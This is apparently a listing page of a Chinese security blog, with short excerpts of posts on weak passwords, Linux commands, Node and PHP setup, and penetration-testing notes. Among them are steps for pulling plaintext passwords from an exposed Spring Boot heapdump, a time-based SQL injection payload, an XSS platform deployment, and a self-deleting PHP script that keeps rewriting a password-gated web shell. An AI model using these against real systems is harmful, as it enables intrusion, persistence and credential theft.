记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

弱口令修复建议

《记录下》 针对建议: (1)使用多种字符组合的强密码,如大小写字母+数字+特殊字符; (2)用户密码中不要出现与用户名或者系统名相关的字符,如用户名@123、系统名123等; (3)不要使用系统默认初始密码;或设定在系统首次登录时,强制修改系统默认初始密码; (4)应避免部门或单位对成员设置相同密码; (5)对系统中密码的存储进行加密处理,避免密码明文存储; (6)增强用户安全意识,定期变更系统密码; (7)应避免同一密码用于多个系统,避免由于信息泄露导致的安全风险连锁反应;
发布时间:2020-08-10 17:24 | 阅读:412 | 评论:0 | 标签:学习路上

spring boot 获取被星号脱敏的密码的明文の方法四-测试

https://github.com/LandGrey/SpringBootVulExploit 利用条件: 可正常 GET 请求目标 /heapdump 或 /actuator/heapdump 接口 利用方法: 步骤一: 找到想要获取的属性名 GET 请求目标网站的 /env 或 /actuator/env 接口,搜索 ****** 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。 步骤二: 下载 jvm heap 信息 下载的 heapdump 文件大小通常在 50M—500M 之间,有时候也可能会大于 2G GET 请求目标的 /heapdump 或 /actuator/heapdump 接口,下载应用实时的 JVM 堆信息 步骤三: 使用 MAT 获得 jvm heap 中的密码明文 参考
发布时间:2020-08-07 19:43 | 阅读:2027 | 评论:0 | 标签:学习路上 spring boot 星号密码查看

linux常用命令

linux常用命令 (1)文本倒序 Linux文本行倒序排列6种方法 1. 命令方法: nl filename | sort -nr | cut -f2 这个方法很unix风格,使用多命令组合完成某种功能是典型的unix特点 单命令: 在linux下,首先想到的就是 tac命令 ,可将文本文件的文本行倒序排列输出 2. AWK方法: awk ‘{line[NR]=$0}END{for(i=NR;i>0;i–)print line}’ filename 这个利用了AWK的数组功能 3. PERL方法: perl -e ‘print reverse <>’ filename 4. SED方法 sed ‘1!G;h;$!d
发布时间:2020-07-27 13:57 | 阅读:3716 | 评论:0 | 标签:学习路上 linux

windows/LINUX版本php5.3.3下载地址

WIN地址: https://windows.php.net/downloads/releases/archives/ linux地址: https://museum.php.net/php5/ apache下载地址 http://archive.apache.org/dist/httpd/     httpd.conf 添加 AddType application/x-httpd-php .php yum install libxml2* -y yum -y install libevent libevent-devel  
发布时间:2020-07-03 18:50 | 阅读:9356 | 评论:0 | 标签:学习路上 linux

2020年最新版本_XSS平台源码部署踩坑

来源:https://www.t00ls.net/thread-55904-1-1.html BY: Shrimp 1、数据库恢复时:DROP TABLE IF EXISTS `oc_keep_sessions`; CREATE TABLE IF NOT EXISTS `oc_keep_sessions` ( `id` int(11) NOT NULL AUTO_INCREMENT, `ks_userid` int(11) NOT NULL COMMENT , `ks_keepsession_id` int(12) DEFAULT NULL COMMENT , `ks_project` varchar(50) DEFAULT NULL COMMENT , `ks_domain`
发布时间:2020-06-18 22:26 | 阅读:12402 | 评论:0 | 标签:学习路上 Shrimp XSS平台 xss

无法访问淘宝等网站的问题处理

最近总是无法正常访问淘宝京东,连测试目前访问都有问题,一直以为是chrome浏览器的问题,重装降级后,还是依然存在,最终排查问题在插件上: 默认我会全部开启 而目标网站会对该类http头做检验。。导致无法正常访问,取消设置后,一切正常
发布时间:2020-06-18 17:52 | 阅读:9066 | 评论:0 | 标签:学习路上

MYSQL 相关语句学习

1、翻了下msyql问文档,貌似没看到对select中 and or的描述;   结论: 当字符串全部为字母,则0 当字符串第一个字符为数字,则为1 当字符串第一个字符为+-.,后面紧跟为数字时,为1 当空值null 与数字 ,则为0;与0 则为null ::null介于1与0 之间   2、SQL语句的短路 and 短路or: mysql中 and即&& or即 || 本身为短路与或;SELECT 'xxxx' AND ( SELECT CASE WHEN 11 = 11 THEN SLEEP(1) ELSE 1 END )SELECT '111' AND ( SELECT CASE WHEN 11 =
发布时间:2020-06-06 22:35 | 阅读:14558 | 评论:0 | 标签:学习路上 ifnull isnull MySQL nullif VulSee.com 微慑网 短路与或 学习

MySQL实时监控代码审计工具集合

1、https://github.com/cw1997/MySQL-Monitor [微慑推荐] 相对其他使用更加清晰,但需要存在web服务   2、MysqlLog.jar   [vulsee.com 微慑网] 3、MYSQL执行语句监视工具.exe 4、https://github.com/TheKingOfDuck/MySQLMonitor <不会用,不知是不是没有配置好,没法监测mysql的执行语句> [vulsee.com 微慑网]
发布时间:2020-06-06 18:01 | 阅读:17952 | 评论:0 | 标签:学习路上 mysqlmonitor MySQL实时监控工具 vulsee vulsee.com工具集合 代码审计工具

Nodejs初学记录

1、对于nodejs程序的运行,安装npm,按照说明运行即可,同时安装相关依赖 2、 npm run xxx,并不是你想运行就运行的,只有在 package.json scripts 配置了,你才能 run 的,所以不是所有的项目都能 npm run dev/build。 要了解这些命令做了什么,就要去scripts中看具体执行的是什么代码。 这里就像是一些命令的快捷方式,免去每次都要输入很长的的命令(比如 serve 那行) 一般项目都会有 build, dev, unit 等,所以起名,最起码要从名字上基本能看出来是干什么的。 3、在nodejs中解决XSS、CSRF问题: 安装模块xss  require(“xss”) 安装模块csrf require(‘cookie-
发布时间:2020-05-29 13:32 | 阅读:17512 | 评论:0 | 标签:学习路上 cnpm CSRF nodejs VulSee.com XSS 如何调试nodejs 微慑网

Nodejs 环境踩坑_1: VulSee.com

最近调试一个程序,node.js开发, 踩坑记录如下: 1、更换源,安装cnpm: npm install -g cnpm –registry=https://registry.npm.taobao.org 安装后使用cnpm安装,速度更快 微慑网 HTTP://VULSEE.COM/ 2、项目启动时,报错Cannot find module ‘node-schedule’ E:\**node_modulesegglibapplication.js:70 throw e; ^ Error: [egg-core] load file: E:*****libplugin**, error: Cannot find module ‘node-schedule’
发布时间:2020-05-22 21:36 | 阅读:17199 | 评论:0 | 标签:学习路上 nodejs VulSee.com 微慑网 环境踩坑

Centos7.4下载地址

具体可以根据需要的版本更换下载链接: http://vault.centos.org/7.X.XXXX/isos/x86_64/ from by http://vulsee.com/ 比如要下载 centos 7.4.1708 版本的下载地址如下: from by http://vulsee.com/ http://vault.centos.org/7.4.1708/isos/x86_64/
发布时间:2020-05-14 17:06 | 阅读:11308 | 评论:0 | 标签:学习路上

POS商户编码构成

POS商户编码构成: 银行代码+地区代码+行业代码+编号: 3+4+4+4=15位: 其中行业代码分类如下: 5200 家庭日用品大商店 5231 玻璃、油彩、墙纸店 5251 五金器具店 5261 草地和花园用品店,包括苗圃 5271 活动房屋经营者 5300 批发俱乐部 5309 免税店 5310 打折店 5311 百货公司 5331 杂货铺 5399 各式各样的日用商品店 5411 食品杂货店、超级市场 5422 冷冻、仓储肉的供应者 5441 蜜饯、坚果、糖果店 5451 奶制品商店 5462 面包店 5499 各式各样的食品店——便利店、专业店 5511 汽车和卡车(新车或二手车)交易商——销售、服务、修理、零部件、租赁 5521 汽车和卡车(只限于二手车)交易商—销售、服务、修理、零部件、租赁 55
发布时间:2020-04-26 15:17 | 阅读:15266 | 评论:0 | 标签:学习路上

wooyun漏洞库图片补全操作

1、本地搭建8W数据漏洞库,根据bugid爬出整个库中的漏洞图片列表:must_table.txt 2、通过linux下shell遍历现有漏洞库中的图片列表:had_table.txt   linux 遍历文件夹下所有文件 3、对比两个文本的差集: sort must_table.txt had_table.txt  | uniq -u  >result.txt 4、构造图片下载地址: cat result.txt | awk ‘{print “http://vulsee.com/”$0}’ >target.txt 5、通过wget对目标进行下载,并强制创建目录: wget -i target.txt -x 6、新增图片资源3.3G;收工
发布时间:2020-04-12 23:21 | 阅读:25289 | 评论:0 | 标签:学习路上 wooyun图片补全 wooyun漏洞图片 WOOYUN漏洞库 漏洞

未预期的符号 `$'{r” 附近有语法错误-dos2unix

执行sh文件时,提示 root@kalier:/home# ./getdir.sh ./getdir.sh:行1: 未预期的符号“$'{r’”附近有语法错误 ‘/getdir.sh:行1: `demofun(){   这个文本是window那边拷到linux中,可能是格式出现问题,安装dos2unix,变更即可: apt-get install dos2unix   root@kalier:/home# dos2unix getdir.sh dos2unix: 正在转换文件 getdir.sh 为Unix格式..            
发布时间:2020-04-10 17:55 | 阅读:23969 | 评论:0 | 标签:学习路上 dos2unix 未预期的符号 `$'{r'' 附近有语法错误

linux 遍历文件夹下所有文件

  linux 遍历文件夹下所有文件#! /bin/bash function read_dir(){ for file in `ls $1` #注意此处这是两个反引号,表示运行系统命令 do if [ -d $1"/"$file ] #注意此处之间一定要加上空格,否则会报错 then read_dir $1"/"$file else echo $1"/"$file #在此处处理文件即可 fi done } #读取第一个参数 read_dir $1 
发布时间:2020-04-10 17:55 | 阅读:18499 | 评论:0 | 标签:学习路上 linux文件遍历 linux

windows/linux下php内存马测试

<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = 'ma_test.php'; $code = '<?php if(md5($_POST["pass"])=="cdd7b7420654eb16c1e1b748d5b7c5b8"){@system($_POST[a]);}?>'; while (1) { file_put_contents($file, $code); //system('touch -m -d "2018-12-01 09:10:12" ma_test.php'); $ntime=date("Y-m-d :h:i:s"); //f
发布时间:2020-03-11 17:36 | 阅读:25096 | 评论:0 | 标签:学习路上 php内存马 内存后门 linux

推广

标签云